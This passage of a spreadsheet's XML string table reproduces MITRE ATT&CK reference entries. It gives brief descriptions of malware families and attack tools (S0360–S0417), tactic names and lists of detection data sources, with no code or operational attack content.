    <t>[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0360</t>
  </si>
  <si>
    <t>S0361</t>
  </si>
  <si>
    <t>Expand</t>
  </si>
  <si>
    <t>[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0361</t>
  </si>
  <si>
    <t>S0362</t>
  </si>
  <si>
    <t>Linux Rabbit</t>
  </si>
  <si>
    <t xml:space="preserve">[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0362</t>
  </si>
  <si>
    <t>S0363</t>
  </si>
  <si>
    <t>Empire</t>
  </si>
  <si>
    <t xml:space="preserve">[Empire](https://attack.mitre.org/software/S0363) is an open source, cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python, the post-exploitation agents are written in pure [PowerShell](https://attack.mitre.org/techniques/T1086) for Windows and Python for Linux/macOS. [Empire](https://attack.mitre.org/software/S0363) was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries.(Citation: NCSC Joint Report Public Tools)(Citation: Github PowerShell Empire)(Citation: GitHub ATTACK Empire)
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0363</t>
  </si>
  <si>
    <t>S0364</t>
  </si>
  <si>
    <t>RawDisk</t>
  </si>
  <si>
    <t>[RawDisk](https://attack.mitre.org/software/S0364) is a legitimate commercial driver from the EldoS Corporation that is used for interacting with files, disks, and partitions. The driver allows for direct modification of data on a local computer's hard drive. In some cases, the tool can enact these raw disk modifications from user-mode processes, circumventing Windows operating system security features.(Citation: EldoS RawDisk ITpro)(Citation: Novetta Blockbuster Destructive Malware)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0364</t>
  </si>
  <si>
    <t>S0365</t>
  </si>
  <si>
    <t>Olympic Destroyer</t>
  </si>
  <si>
    <t xml:space="preserve">[Olympic Destroyer](https://attack.mitre.org/software/S0365) is malware that was first seen infecting computer systems at the 2018 Winter Olympics, held in Pyeongchang, South Korea. The main purpose of the malware appears to be to cause destructive impact to the affected systems. The malware leverages various native Windows utilities and API calls to carry out its destructive tasks. The malware has worm-like features to spread itself across a computer network in order to maximize its destructive impact.(Citation: Talos Olympic Destroyer 2018) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0365</t>
  </si>
  <si>
    <t>S0366</t>
  </si>
  <si>
    <t>WannaCry</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0366</t>
  </si>
  <si>
    <t>S0367</t>
  </si>
  <si>
    <t>Emotet</t>
  </si>
  <si>
    <t>[Emotet](https://attack.mitre.org/software/S0367) is a modular malware variant which is primarily used as a downloader for other malware variants such as [TrickBot](https://attack.mitre.org/software/S0266) and IcedID. Emotet first emerged in June 2014 and has been primarily used to target the banking sector. (Citation: Trend Micro Banking Malware Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0367</t>
  </si>
  <si>
    <t>S0368</t>
  </si>
  <si>
    <t>NotPetya</t>
  </si>
  <si>
    <t>[NotPetya](https://attack.mitre.org/software/S0368) is malware that was first seen in a worldwide attack starting on June 27, 2017. The main purpose of the malware appeared to be to effectively destroy data and disk structures on compromised systems. Though [NotPetya](https://attack.mitre.org/software/S0368) presents itself as a form of ransomware, it appears likely that the attackers never intended to make the encrypted data recoverable. As such, [NotPetya](https://attack.mitre.org/software/S0368) may be more appropriately thought of as a form of wiper malware. [NotPetya](https://attack.mitre.org/software/S0368) contains worm-like features to spread itself across a computer network using the SMBv1 exploits EternalBlue and EternalRomance.(Citation: Talos Nyetya June 2017)(Citation: Talos Nyetya June 2017)(Citation: US-CERT NotPetya 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0368</t>
  </si>
  <si>
    <t>S0369</t>
  </si>
  <si>
    <t>CoinTicker</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) is a malicious application that poses as a cryptocurrency price ticker and installs components of the open source backdoors EvilOSX and EggShell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0369</t>
  </si>
  <si>
    <t>S0370</t>
  </si>
  <si>
    <t>SamSam</t>
  </si>
  <si>
    <t>[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0370</t>
  </si>
  <si>
    <t>S0371</t>
  </si>
  <si>
    <t>POWERTON</t>
  </si>
  <si>
    <t>[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0371</t>
  </si>
  <si>
    <t>S0372</t>
  </si>
  <si>
    <t>LockerGoga</t>
  </si>
  <si>
    <t>[LockerGoga](https://attack.mitre.org/software/S0372) is ransomware that has been tied to various attacks on European companies. It was first reported upon in January 2019.(Citation: Unit42 LockerGoga 2019)(Citation: CarbonBlack LockerGoga 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0372</t>
  </si>
  <si>
    <t>S0373</t>
  </si>
  <si>
    <t>Astaroth</t>
  </si>
  <si>
    <t>[Astaroth](https://attack.mitre.org/software/S0373) is a Trojan and information stealer known to affect companies in Europe and Brazil. It has been known publicly since at least late 2017. (Citation: Cybereason Astaroth Feb 2019) (Citation: Cofense Astaroth Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0373</t>
  </si>
  <si>
    <t>S0374</t>
  </si>
  <si>
    <t>SpeakUp</t>
  </si>
  <si>
    <t>[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0374</t>
  </si>
  <si>
    <t>S0375</t>
  </si>
  <si>
    <t>Remexi</t>
  </si>
  <si>
    <t>[Remexi](https://attack.mitre.org/software/S0375) is a Windows-based Trojan that was developed in the C programming language.(Citation: Securelist Remexi Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0375</t>
  </si>
  <si>
    <t>S0376</t>
  </si>
  <si>
    <t>HOPLIGHT</t>
  </si>
  <si>
    <t>[HOPLIGHT](https://attack.mitre.org/software/S0376) is a backdoor Trojan that has reportedly been used by the North Korean government.(Citation: US-CERT HOPLIGHT Apr 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0376</t>
  </si>
  <si>
    <t>S0377</t>
  </si>
  <si>
    <t>Ebury</t>
  </si>
  <si>
    <t>[Ebury](https://attack.mitre.org/software/S0377) is an SSH backdoor targeting Linux operating systems. Attackers require root-level access, which allows them to replace SSH binaries (ssh, sshd, ssh-add, etc) or modify a shared library used by OpenSSH (libkeyutils).(Citation: ESET Ebury Feb 2014)(Citation: BleepingComputer Ebury March 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0377</t>
  </si>
  <si>
    <t>S0378</t>
  </si>
  <si>
    <t>PoshC2</t>
  </si>
  <si>
    <t>[PoshC2](https://attack.mitre.org/software/S0378) is an open source remote administration and post-exploitation framework that is publicly available on GitHub. The server-side components of the tool are primarily written in Python, while the implants are written in [PowerShell](https://attack.mitre.org/techniques/T1086). Although [PoshC2](https://attack.mitre.org/software/S0378) is primarily focused on Windows implantation, it does contain a basic Python dropper for Linux/macOS.(Citation: GitHub PoshC2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0378</t>
  </si>
  <si>
    <t>S0379</t>
  </si>
  <si>
    <t>Revenge RAT</t>
  </si>
  <si>
    <t>[Revenge RAT](https://attack.mitre.org/software/S0379) is a freely available remote access tool written in .NET (C#).(Citation: Cylance Shaheen Nov 2018)(Citation: Cofense RevengeRAT Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0379</t>
  </si>
  <si>
    <t>S0380</t>
  </si>
  <si>
    <t>StoneDrill</t>
  </si>
  <si>
    <t>[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064).(Citation: FireEye APT33 Sept 2017)(Citation: Kaspersky StoneDrill 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0380</t>
  </si>
  <si>
    <t>S0381</t>
  </si>
  <si>
    <t>FlawedAmmyy</t>
  </si>
  <si>
    <t>[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0381</t>
  </si>
  <si>
    <t>S0382</t>
  </si>
  <si>
    <t>ServHelper</t>
  </si>
  <si>
    <t>[ServHelper](https://attack.mitre.org/software/S0382) is a backdoor first observed in late 2018. The backdoor is written in Delphi and is typically delivered as a DLL file.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0382</t>
  </si>
  <si>
    <t>S0383</t>
  </si>
  <si>
    <t>FlawedGrace</t>
  </si>
  <si>
    <t>[FlawedGrace](https://attack.mitre.org/software/S0383) is a fully featured remote access tool (RAT) written in C++ that was first observed in late 2017.(Citation: Proofpoint TA505 Jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0383</t>
  </si>
  <si>
    <t>S0384</t>
  </si>
  <si>
    <t>Dridex</t>
  </si>
  <si>
    <t>[Dridex](https://attack.mitre.org/software/S0384) is a banking Trojan that has been used for financial gain. Dridex was created from the source code of the Bugat banking trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0384</t>
  </si>
  <si>
    <t>S0385</t>
  </si>
  <si>
    <t>njRAT</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0385</t>
  </si>
  <si>
    <t>S0386</t>
  </si>
  <si>
    <t>Ursnif</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0386</t>
  </si>
  <si>
    <t>S0387</t>
  </si>
  <si>
    <t>KeyBoy</t>
  </si>
  <si>
    <t>[KeyBoy](https://attack.mitre.org/software/S0387) is malware that has been used in targeted campaigns against members of the Tibetan Parliament in 2016.(Citation: CitizenLab KeyBoy Nov 2016)(Citation: PWC KeyBoys Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0387</t>
  </si>
  <si>
    <t>S0388</t>
  </si>
  <si>
    <t>Yahoyah</t>
  </si>
  <si>
    <t>Yahoyah is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0388</t>
  </si>
  <si>
    <t>S0389</t>
  </si>
  <si>
    <t>JCry</t>
  </si>
  <si>
    <t>[JCry](https://attack.mitre.org/software/S0389) is ransomware written in Go. It was identified as apart of the #OpJerusalem 2019 campaign.(Citation: Carbon Black JCry May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0389</t>
  </si>
  <si>
    <t>S0390</t>
  </si>
  <si>
    <t>SQLRat</t>
  </si>
  <si>
    <t>[SQLRat](https://attack.mitre.org/software/S0390) is malware that executes SQL scripts to avoid leaving traditional host artifacts. [FIN7](https://attack.mitre.org/groups/G0046) has been observed using it.(Citation: Flashpoint FIN 7 March 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0390</t>
  </si>
  <si>
    <t>S0391</t>
  </si>
  <si>
    <t>HAWKBALL</t>
  </si>
  <si>
    <t>[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0391</t>
  </si>
  <si>
    <t>S0393</t>
  </si>
  <si>
    <t>PowerStallion</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) is a lightweight [PowerShell](https://attack.mitre.org/techniques/T1086) backdoor used by [Turla](https://attack.mitre.org/groups/G0010), possibly as a recovery access tool to install other backdoors.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0393</t>
  </si>
  <si>
    <t>S0394</t>
  </si>
  <si>
    <t>HiddenWasp</t>
  </si>
  <si>
    <t>[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statistically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0394</t>
  </si>
  <si>
    <t>S0395</t>
  </si>
  <si>
    <t>LightNeuron</t>
  </si>
  <si>
    <t>[LightNeuron](https://attack.mitre.org/software/S0395) is a sophisticated backdoor that has targeted Microsoft Exchange servers since at least 2014. [LightNeuron](https://attack.mitre.org/software/S0395) has been used by [Turla](https://attack.mitre.org/groups/G0010) to target diplomatic and foreign affairs-related organizations. The presence of certain strings in the malware suggests a Linux variant of [LightNeuron](https://attack.mitre.org/software/S0395) exists.(Citation: ESET LightNeuron May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0395</t>
  </si>
  <si>
    <t>S0396</t>
  </si>
  <si>
    <t>EvilBunny</t>
  </si>
  <si>
    <t>[EvilBunny](https://attack.mitre.org/software/S0396) is a C++ malware sample observed since 2011 that was designed to be a execution platform for Lua scripts.(Citation: Cyphort EvilBunny Dec 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0396</t>
  </si>
  <si>
    <t>S0397</t>
  </si>
  <si>
    <t>LoJax</t>
  </si>
  <si>
    <t>[LoJax](https://attack.mitre.org/software/S0397) is a UEFI rootkit used by [APT28](https://attack.mitre.org/groups/G0007) to persist remote access software on targeted systems.(Citation: ESET LoJax Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0397</t>
  </si>
  <si>
    <t>S0398</t>
  </si>
  <si>
    <t>HyperBro</t>
  </si>
  <si>
    <t>[HyperBro](https://attack.mitre.org/software/S0398) is a custom in-memory backdoor used by [Threat Group-3390](https://attack.mitre.org/groups/G0027).(Citation: Unit42 Emissary Panda May 2019)(Citation: Securelist LuckyMouse June 2018)(Citation: Hacker News LuckyMouse June 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0398</t>
  </si>
  <si>
    <t>S0400</t>
  </si>
  <si>
    <t>RobbinHood</t>
  </si>
  <si>
    <t>[RobbinHood](https://attack.mitre.org/software/S0400) is ransomware that was first observed being used in an attack against the Baltimore city government's computer network.(Citation: CarbonBlack RobbinHood May 2019)(Citation: BaltimoreSun RobbinHood May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0400</t>
  </si>
  <si>
    <t>S0401</t>
  </si>
  <si>
    <t>Exaramel for Linux</t>
  </si>
  <si>
    <t>[Exaramel for Linux](https://attack.mitre.org/software/S0401) is a backdoor written in the Go Programming Language and compiled as a 64-bit ELF binary. The Windows version is tracked separately under [Exaramel for Windows](https://attack.mitre.org/software/S0343).(Citation: ESET TeleBots Oct 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0401</t>
  </si>
  <si>
    <t>S0402</t>
  </si>
  <si>
    <t>OSX/Shlayer</t>
  </si>
  <si>
    <t>[OSX/Shlayer](https://attack.mitre.org/software/S0402) is a Trojan designed to install adware on macOS. It was first discovered in 2018.(Citation: Carbon Black Shlayer Feb 2019)(Citation: Intego Shlayer Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0402</t>
  </si>
  <si>
    <t>S0404</t>
  </si>
  <si>
    <t>esentutl</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0404</t>
  </si>
  <si>
    <t>S0409</t>
  </si>
  <si>
    <t>[Machete](https://attack.mitre.org/software/S0409) is a cyber espionage toolset developed by a Spanish-speaking group known as El [Machete](https://attack.mitre.org/groups/G0095). It is a Python-based backdoor targeting Windows machines, and it was first observed in 2010.(Citation: ESET Machete July 2019)(Citation: Securelist Machete Aug 2014)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0409</t>
  </si>
  <si>
    <t>S0410</t>
  </si>
  <si>
    <t>Fysbis</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) is a Linux-based backdoor used by [APT28](https://attack.mitre.org/groups/G0007) that dates back to at least 2014.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0410</t>
  </si>
  <si>
    <t>S0412</t>
  </si>
  <si>
    <t>ZxShell</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0412</t>
  </si>
  <si>
    <t>S0413</t>
  </si>
  <si>
    <t>MailSniper</t>
  </si>
  <si>
    <t>MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)</t>
  </si>
  <si>
    <t>Office 365, Windows</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0413</t>
  </si>
  <si>
    <t>S0414</t>
  </si>
  <si>
    <t>BabyShark</t>
  </si>
  <si>
    <t>[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0414</t>
  </si>
  <si>
    <t>S0415</t>
  </si>
  <si>
    <t>BOOSTWRITE</t>
  </si>
  <si>
    <t>[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046).(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0415</t>
  </si>
  <si>
    <t>S0416</t>
  </si>
  <si>
    <t>RDFSNIFFER</t>
  </si>
  <si>
    <t>[RDFSNIFFER](https://attack.mitre.org/software/S0416) is a module loaded by [BOOSTWRITE](https://attack.mitre.org/software/S0415) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.(Citation: FireEye FIN7 Oct 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0416</t>
  </si>
  <si>
    <t>S0417</t>
  </si>
  <si>
    <t>GRIFFON</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) is a JavaScript backdoor used by [FIN7](https://attack.mitre.org/groups/G0046). (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0417</t>
  </si>
  <si>
    <t>initial-access</t>
  </si>
  <si>
    <t>persistence</t>
  </si>
  <si>
    <t>lateral-movement</t>
  </si>
  <si>
    <t>execution</t>
  </si>
  <si>
    <t>privilege-escalation</t>
  </si>
  <si>
    <t>defense-evasion</t>
  </si>
  <si>
    <t>discovery</t>
  </si>
  <si>
    <t>credential-access</t>
  </si>
  <si>
    <t>Mitigation Summary  [see link for up-to-date mitigations]</t>
  </si>
  <si>
    <t>User</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>SSL/TLS inspection, Anti-virus, Web proxy</t>
  </si>
  <si>
    <t>macOS</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>Anti-virus, System calls, Process monitoring</t>
  </si>
  <si>
    <t>Process monitoring, File monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>Windows Registry, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>Anti-virus, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>Windows Registry, File monitoring, Process monitoring</t>
  </si>
  <si>
    <t>Administrator</t>
  </si>
  <si>
    <t>Loaded DLLs, Process monitoring, Windows Registry</t>
  </si>
  <si>
    <t>DLL monitoring, Windows Registry, Loaded DLLs</t>
  </si>
  <si>
    <t>API monitoring, Packet capture, Windows event logs</t>
  </si>
  <si>
    <t>API monitoring, MBR, VBR</t>
  </si>
  <si>
    <t>SYSTEM</t>
  </si>
  <si>
    <t>Windows Registry, DLL monitoring, Loaded DLLs</t>
  </si>
  <si>
    <t>File monitoring, Services, Process command-line parameters</t>
  </si>
  <si>
    <t>Process monitoring, Windows Registry, Windows event logs</t>
  </si>
  <si>
    <t>System calls, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>root</t>
  </si>
  <si>
    <t>DLL monitoring, Windows Registry, Process monitoring</t>
  </si>
  <si>
    <t>Process monitoring, File monitoring, PowerShell logs</t>
  </si>
  <si>
    <t>Process command-line parameters, Services, Windows Registry</t>
  </si>
  <si>
    <t>API monitoring, BIOS, EFI</t>
  </si>
  <si>
    <t>Process command-line parameters, Process monitoring, File monitoring</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, API monitoring</t>
  </si>
  <si>
    <t>Windows Error Reporting, Process monitoring, Application logs</t>
  </si>
  <si>
    <t>Windows event logs, Process monitoring, API monitoring</t>
  </si>
  <si>
    <t>API monitoring, Authentication logs, Windows event logs</t>
  </si>
  <si>
    <t>Binary file metadata, File monitoring, Malware reverse engineering</t>
  </si>
  <si>
    <t>Process use of network, Process monitoring, Loaded DLLs</t>
  </si>
  <si>
    <t>Windows Error Reporting, Process monitoring, File monitoring</t>
  </si>
  <si>
    <t>File monitoring, Process command-line parameters, Binary file metadata</t>
  </si>
  <si>
    <t>Sensor health and status, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>Binary file metadata, Malware reverse engineering, Process monitoring</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, Binary file metadata</t>
  </si>
  <si>
    <t>BIOS, MBR, System calls</t>
  </si>
  <si>
    <t>Stackdriver logs, Azure activity logs, AWS CloudTrail logs</t>
  </si>
  <si>
    <t>Azure activity logs, AWS CloudTrail logs, Authentication logs</t>
  </si>
  <si>
    <t>Windows Registry, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>Authentication logs, Windows Error Reporting, Process monitoring</t>
  </si>
  <si>
    <t>DLL monitoring, Process monitoring, Windows Registry</t>
  </si>
  <si>
    <t>API monitoring, Process monitoring, Kernel drivers</t>
  </si>
  <si>
    <t>API monitoring, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>Azure activity logs, Stackdriver logs, AWS CloudTrail logs</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters, API monitoring</t>
  </si>
  <si>
    <t>File monitoring, Process use of network, Process monitoring</t>
  </si>
  <si>
    <t>Authentication logs, Netflow/Enclave netflow, Process monitoring</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>API monitoring, Process monitoring, File monitoring</t>
  </si>
  <si>
    <t>File monitoring, Data loss prevention, Process command-line parameters</t>
  </si>
  <si>
    <t>Process monitoring, File monitoring, API monitoring</t>
  </si>
  <si>
    <t>command-and-control</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow, Process use of network, Process monitoring</t>
  </si>
  <si>
    <t>exfiltration</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring, Process use of network</t>
  </si>
  <si>
    <t>impact</t>
  </si>
  <si>
    <t>Windows event logs, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>File monitoring, Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>Kernel drivers, Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>Android</t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>Asset management, Data loss prevention</t>
  </si>
  <si>
    <t>File monitoring, Data loss prevention</t>
  </si>
  <si>
    <t>Web proxy, File monitoring</t>
  </si>
  <si>
    <t>Process monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>API monitoring, Process monitoring</t>
  </si>
  <si>
    <t>File monitoring, Process monitoring</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>File monitoring, API monitoring</t>
  </si>
  <si>
    <t>System calls</t>
  </si>
  <si>
    <t>Process monitoring, File monitoring</t>
  </si>
  <si>
    <t>Packet capture, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Windows Registry, File monitoring</t>
  </si>
  <si>
    <t>File monitoring, Application logs</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>File monitoring, Process command-line parameters</t>
  </si>
  <si>
    <t>OAuth audit logs, Office 365 account logs</t>
  </si>
  <si>
    <t>Authentication logs, File monitoring</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>API monitoring</t>
  </si>
  <si>
    <t>Windows event logs</t>
  </si>
  <si>
    <t>SSL/TLS inspection, Digital certificate logs</t>
  </si>
  <si>
    <t>Process monitoring, API monitoring</t>
  </si>
  <si>
    <t>Authentication logs, Office 365 account logs</t>
  </si>
  <si>
    <t>Office 365 account logs, Authentication logs</t>
  </si>
  <si>
    <t>System calls, Process monitoring</t>
  </si>
  <si>
    <t>Azure activity logs, OAuth audit logs</t>
  </si>
  <si>
    <t>Process command-line parameters, Process monitoring</t>
  </si>
  <si>
    <t>SSL/TLS inspection, Packet capture</t>
  </si>
  <si>
    <t>Network protocol analysis, Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>User interface, Process monitoring</t>
  </si>
  <si>
    <t>Data loss prevention, File monitoring</t>
  </si>
  <si>
    <t>Kernel drivers, MBR</t>
  </si>
  <si>
    <t>BIOS, Component firmware</t>
  </si>
  <si>
    <t>Application logs, File monitoring</t>
  </si>
  <si>
    <t>Packet capture, Network protocol analysis</t>
  </si>
  <si>
    <t>Permissions</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="14"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>OWASP Cyber Controls Matrix (OCCM) @ https://cybercontrolsmatrix.com</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
The content of this spreadsheet is © 2020 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation.
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="12"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">IMPORTANT:  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">Use of this content is completely as-is, with no warranties either expressed or implied. Before use, see further important information in the Legal Text section at the above website.
